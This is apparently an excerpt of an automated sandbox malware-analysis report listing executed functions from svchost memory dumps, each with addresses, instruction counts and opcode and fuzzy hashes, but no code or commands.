                                                                                                                                                                                                                                              • Instruction ID: 6651c85744b274c3431fa1a54605c478d678eadacbef0df49eeca8f814d7b1b3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb67044c1718e168850256710079855a6ee0c5961a0dc58c957fe3930c4e7e14
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F512290B1E6C64FD787AB7888646757FE5DF87216B0801FAE0C9C72A3DD484806C342
                                                                                                                                                                                                                                              Function 00007FFB4B0F0DF2 Relevance: .6, Instructions: 550COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000019.00000002.2171632848.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffb4b0f0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 7f6933f81bf76320b9d6d0d51c08b5bd384fe29826b52ea816406f012eb22771
                                                                                                                                                                                                                                              • Instruction ID: c6754a7d78bbd5d13cc2a2c9052dd416dd64801ed9ce8c682a584822ad19a5c6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f6933f81bf76320b9d6d0d51c08b5bd384fe29826b52ea816406f012eb22771
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0631B4A2A0DA8E4FE745FFB8C8A14E97FB0FF95211F4441B6D189D72A3DD582806C390
                                                                                                                                                                                                                                              Function 00007FFB4B0F0E30 Relevance: .5, Instructions: 519COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000019.00000002.2171632848.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffb4b0f0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 1d3eb1cf4531799d258c376aa8c44ab3bacb4b6893249372af44e6d54af82f13
                                                                                                                                                                                                                                              • Instruction ID: 3cd527d94b0b0a7ba0785d7966e47ae2ca8a2a21c73beb268029c5eaadefcb81
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1d3eb1cf4531799d258c376aa8c44ab3bacb4b6893249372af44e6d54af82f13
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0121A3A190DA8E4FE745EFB8C8A15EA7FF1FF55201F8440A5D149D72E3DD682801C380
                                                                                                                                                                                                                                              Function 00007FFB4B0F12C9 Relevance: .2, Instructions: 246COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000019.00000002.2171632848.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffb4b0f0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 22741b0d47edc778e98d30c2bae8517167ebb0fde7444e36531716e0f05b8624
                                                                                                                                                                                                                                              • Instruction ID: ffad72eb7a7ab49f843369e58c3a44b11af043f16c7e31735d06ce9a1b48095f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 22741b0d47edc778e98d30c2bae8517167ebb0fde7444e36531716e0f05b8624
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9B715FA0B29A498FEB99BB78C46D6BD76D2FF89305F404478E50EC32D2DD6DA801C750
                                                                                                                                                                                                                                              Function 00007FFB4B0F0C3E Relevance: .2, Instructions: 190COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000019.00000002.2171632848.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffb4b0f0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: c0c210469918535e72571f614aeb33bae65086828c0f3c35b588198de84d936b
                                                                                                                                                                                                                                              • Instruction ID: 2312cddc7d31ff60bf69aa4de66c2c2d8860e57992d3d6c2c5f78289c047215b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c0c210469918535e72571f614aeb33bae65086828c0f3c35b588198de84d936b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 27510561B0E68A0FE397AB3CD8555B57BE1DF87221B0941FBD48CC72A3EC58AC468351
                                                                                                                                                                                                                                              Function 00007FFB4B0F0538 Relevance: .1, Instructions: 135COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000019.00000002.2171632848.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffb4b0f0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 6f4c1cdcc80f8e72d3173afc8bd43940aff781365ec7087b8eff508f3f8f1d7e
                                                                                                                                                                                                                                              • Instruction ID: e2c381b543a7b8402e952b13fefa60124f5b364307d98fb30789a906b81c9bdc
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f4c1cdcc80f8e72d3173afc8bd43940aff781365ec7087b8eff508f3f8f1d7e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F531E061B1D9490FE789FA3CC85A679B6C2EF99311F0401BEE44EC32A3DE689C428344
                                                                                                                                                                                                                                              Function 00007FFB4B0F0AD1 Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000019.00000002.2171632848.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffb4b0f0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: f31924417bb43cbcf7248e2be088c48b15cc4627aecf326de3d5f7e32b0f9e67
                                                                                                                                                                                                                                              • Instruction ID: b146b2384389625c43987c70c9937261856e3920392955cbe504822992d05d04
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f31924417bb43cbcf7248e2be088c48b15cc4627aecf326de3d5f7e32b0f9e67
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF3109A1B1D9094FE745BFBCC80A7BC77E1EF99302F0442BAE50CC3292DD2858028352
                                                                                                                                                                                                                                              Function 00007FFB4B0F0985 Relevance: .1, Instructions: 117COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000019.00000002.2171632848.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffb4b0f0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 21ebbe6f680788b8339002e48ef3add7a660bd422cbe7227cd7c86313c147895
                                                                                                                                                                                                                                              • Instruction ID: f7c7fe562a1443243a25240ae2f43a8a24bc63da59f7269ebcd1e727bdceb140
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21ebbe6f680788b8339002e48ef3add7a660bd422cbe7227cd7c86313c147895
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E318C70A19A4E8FEB45EFB8C4556A9B7E1FF88300F5045B8D009C7286DE29A802C751
                                                                                                                                                                                                                                              Function 00007FFB4B0F0868 Relevance: .1, Instructions: 79COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000019.00000002.2171632848.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffb4b0f0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 696208df57174e52247848d592128252b2a10be1ab4958dfdcaadc675f062c37
                                                                                                                                                                                                                                              • Instruction ID: a9b092613c211e965a0bd47473dac050955df21c7f61ed42771df63259380844
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 696208df57174e52247848d592128252b2a10be1ab4958dfdcaadc675f062c37
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 98218764A1A64DCFE782FF78C4A56E9BBF1AF85214F8084E9E409C739BDD2C6801C751
                                                                                                                                                                                                                                              Function 00007FFB4B0F1E71 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000019.00000002.2171632848.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffb4b0f0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 346b099853e0ec330834e6924e937add2383bcad90d414f02c709f7cde66c90c
                                                                                                                                                                                                                                              • Instruction ID: 08294af617a53da4ffc551f02e3c108d8034576b78a5ccf5348f2ed41fa86ca2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 346b099853e0ec330834e6924e937add2383bcad90d414f02c709f7cde66c90c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 73014950E0D7C58FF746BF3888558727FE1DF92211B0804EFE889C62A7EC48A954C392

                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                              Function 00007FFB4B0D1CA1 Relevance: .2, Instructions: 204COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.2265507263.00007FFB4B0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0D0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffb4b0d0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 41990c0b0524863284caac00f4590a7a38371d984cdf0da14cc11f0561dad08b
                                                                                                                                                                                                                                              • Instruction ID: b72d52e919037fa7b32a5f0559b9616600ee101bc96dcc6c07439c8040f4ac2c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41990c0b0524863284caac00f4590a7a38371d984cdf0da14cc11f0561dad08b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D51139061E6C54FD787AB7898642B57FD9DF8721AB1800FEE0C9C72E3DE184806C346
                                                                                                                                                                                                                                              Function 00007FFB4B0D0DF2 Relevance: .5, Instructions: 547COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.2265507263.00007FFB4B0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0D0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffb4b0d0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 34476ff4007f0a91e44b87b3da27ea9c0b5f4924cc86faad2cca23005c87ff27
                                                                                                                                                                                                                                              • Instruction ID: 801f0c08e22364cbe9ee0e9425222629f8e3b751dcdfa247cf861f70ed3af5e6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 34476ff4007f0a91e44b87b3da27ea9c0b5f4924cc86faad2cca23005c87ff27
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1031C9A290CB9A4FE741EF78D8A11E97FB4FF95211B4440BBC189C72E3ED185846C390
                                                                                                                                                                                                                                              Function 00007FFB4B0D0E30 Relevance: .5, Instructions: 516COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.2265507263.00007FFB4B0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0D0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffb4b0d0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 9e7f152ef8dd6287aa40081cee4c106885268d18d15ca8c009f3fc1355042e77
                                                                                                                                                                                                                                              • Instruction ID: b75a6c0ad02b18f38ffe20f8106abc0aedd13b7e1421539576a07f8f04629082
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9e7f152ef8dd6287aa40081cee4c106885268d18d15ca8c009f3fc1355042e77
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CD2192A291CB8A4FE745AF78C8A51F9BFB5FF55201F4540AAD14AD32E3ED286805C390
                                                                                                                                                                                                                                              Function 00007FFB4B0D12C9 Relevance: .2, Instructions: 246COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.2265507263.00007FFB4B0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0D0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffb4b0d0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 97a1b3458728b04d846b87cf78cfaa9a5aa51d8eef428cb9d79250b8a11a434a
                                                                                                                                                                                                                                              • Instruction ID: 7e562b8f563fd4435c9bce176958b5df41ba7a48b99bd7554b8cd80f3c97d9e5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 97a1b3458728b04d846b87cf78cfaa9a5aa51d8eef428cb9d79250b8a11a434a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3971B6A0A6CA494FD799BB78D4696BD7A95FF98341F4044B8E50EC33D6ED28A801C740
                                                                                                                                                                                                                                              Function 00007FFB4B0D0C3E Relevance: .2, Instructions: 187COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.2265507263.00007FFB4B0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0D0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffb4b0d0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 4e2ccfd54f04a743d77fd962a319c0abf567867f8fbc242112f17a662cb5a6cd
                                                                                                                                                                                                                                              • Instruction ID: e614070fdf9f18efd4f92c952b8f3968e6845b1e154a19dbc1353395fb1bed38
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4e2ccfd54f04a743d77fd962a319c0abf567867f8fbc242112f17a662cb5a6cd
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A9510661A0E6860FE397A738D8652B57BE5DF8621170940FBD48CC72A3ED1CAC468362
                                                                                                                                                                                                                                              Function 00007FFB4B0D0538 Relevance: .1, Instructions: 135COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.2265507263.00007FFB4B0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0D0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffb4b0d0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 53b27c9b5883d938be9adc5d2a96d6067645de320c10d512a0f00f5beedc2f04
                                                                                                                                                                                                                                              • Instruction ID: fc76fc91719700f074b6df4dac3294d3044675bcabc7612cc0bb09728553b21e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 53b27c9b5883d938be9adc5d2a96d6067645de320c10d512a0f00f5beedc2f04
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A31B161B1D9490FE789FA7CD85A379B6C6EF99211F0405BEE44EC32E3DE289C428345
                                                                                                                                                                                                                                              Function 00007FFB4B0D0AD1 Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.2265507263.00007FFB4B0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0D0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffb4b0d0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 4dfa5e2b06f078d85e1592b0b406ab4926421dcd4ec2abde25b6a32e672c174f
                                                                                                                                                                                                                                              • Instruction ID: 51639e0dfeaab6f337daf567d189e3deff5a07999a0f8d6388c7f2908d3e379d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4dfa5e2b06f078d85e1592b0b406ab4926421dcd4ec2abde25b6a32e672c174f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0C3129A1B1C9054FE745BBBCD81A3BD77E5EF99312F0442BAE40CC32D2DD2858028362
                                                                                                                                                                                                                                              Function 00007FFB4B0D0985 Relevance: .1, Instructions: 117COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.2265507263.00007FFB4B0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0D0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffb4b0d0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 54e4fb72505577f781d826a5f541949523f65027a4d8d724c74acba9a789af48
                                                                                                                                                                                                                                              • Instruction ID: d6dabd69bcdad7e151027b3baf53d35522b3d42e6bd72217b8942f8ee41fb39e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 54e4fb72505577f781d826a5f541949523f65027a4d8d724c74acba9a789af48
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 60319DB0A19A0E8FEB45EF78D4656FDBBA1FF98300F5045B8D109C7286DE28A842C750
                                                                                                                                                                                                                                              Function 00007FFB4B0D0868 Relevance: .1, Instructions: 79COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.2265507263.00007FFB4B0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0D0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffb4b0d0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 8219d5f8ccb214a5baa870e428d9b4542131d51de7d1c54d5791b7693914008c
                                                                                                                                                                                                                                              • Instruction ID: 0078caa5f082bff9b1d1bb05ec757438d82671fd2811f37b306c5d1470c50952
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8219d5f8ccb214a5baa870e428d9b4542131d51de7d1c54d5791b7693914008c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3921D4A1A4964DCFD741EF38D0955F9BF75BF95210B8049E5D90DC338BDD286801C751
                                                                                                                                                                                                                                              Function 00007FFB4B0D1E71 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.2265507263.00007FFB4B0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0D0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffb4b0d0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: d1d122283951cd3c387bebd3cd26754317bcad0d332a800823bd1a4e05767122
                                                                                                                                                                                                                                              • Instruction ID: 167fde886e64177d4c6431f967dc083190ed62d82a8ef8c20b0619ad317213b8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d1d122283951cd3c387bebd3cd26754317bcad0d332a800823bd1a4e05767122
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D7012690D0D7C54FE742AB389851472BFE1DF92211B0844EFE889C61E7ED18A9558392

                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                              Function 00007FFB4B0E1CA1 Relevance: .2, Instructions: 207COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000001B.00000002.2354496055.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_7ffb4b0e0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 448dbc8ca9aaccc7e089367688abb32a8474bc0f0c08affce00f01800daec425
                                                                                                                                                                                                                                              • Instruction ID: 0d88895aef6d4fa52dc52c0dd237d4b8d8963da305022be19e31a267e29af354
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 448dbc8ca9aaccc7e089367688abb32a8474bc0f0c08affce00f01800daec425
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1512190A1E6CA5FD787AB7888642B57FD5DF8721AB1800FBE0C9C72E3DD185806C342
                                                                                                                                                                                                                                              Function 00007FFB4B0E0DF2 Relevance: .6, Instructions: 550COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000001B.00000002.2354496055.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_7ffb4b0e0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: eacbe5f02be8b884dcf7b87044adeee3241796db22425eb434a187b6f9d8be56
                                                                                                                                                                                                                                              • Instruction ID: eb50f70d26647ef03bf6e995a2ad71f1c6b13d305500044110c315747d928e9b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eacbe5f02be8b884dcf7b87044adeee3241796db22425eb434a187b6f9d8be56
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FB31EAA290CB9A1FD746AFBCC8A51E97FB0FF55211B4844BAC189D72A3DC186806C390
                                                                                                                                                                                                                                              Function 00007FFB4B0E0E30 Relevance: .5, Instructions: 519COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000001B.00000002.2354496055.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_7ffb4b0e0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 5e6ccb08ff60503b10a83e2be75bab26407fc7e6e8024ef0a126e2a44ca528a8
                                                                                                                                                                                                                                              • Instruction ID: f6fee78082ec710e3ea94133e64f8da7707f806c4e80138bae593104777a0e8a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e6ccb08ff60503b10a83e2be75bab26407fc7e6e8024ef0a126e2a44ca528a8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4321B7A280CB8E5FE746AFB8C8651E97FB1FF55201F4845BAD08AD32E3DD286805C340
                                                                                                                                                                                                                                              Function 00007FFB4B0E12C9 Relevance: .2, Instructions: 246COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000001B.00000002.2354496055.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_7ffb4b0e0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 74dcd70cf5ed4a1337992ea67dbc98f446aef0d1e73497ba799259c79ad415e0
                                                                                                                                                                                                                                              • Instruction ID: def572ecb60baab2546a614bdc8aa75b1e122ea31460ef8d4c50dc933489f8f7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 74dcd70cf5ed4a1337992ea67dbc98f446aef0d1e73497ba799259c79ad415e0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9871B2A1A18A895FE798BB38D4596BD77D1FF89301B404478E54EC37D2ED2CE802C750
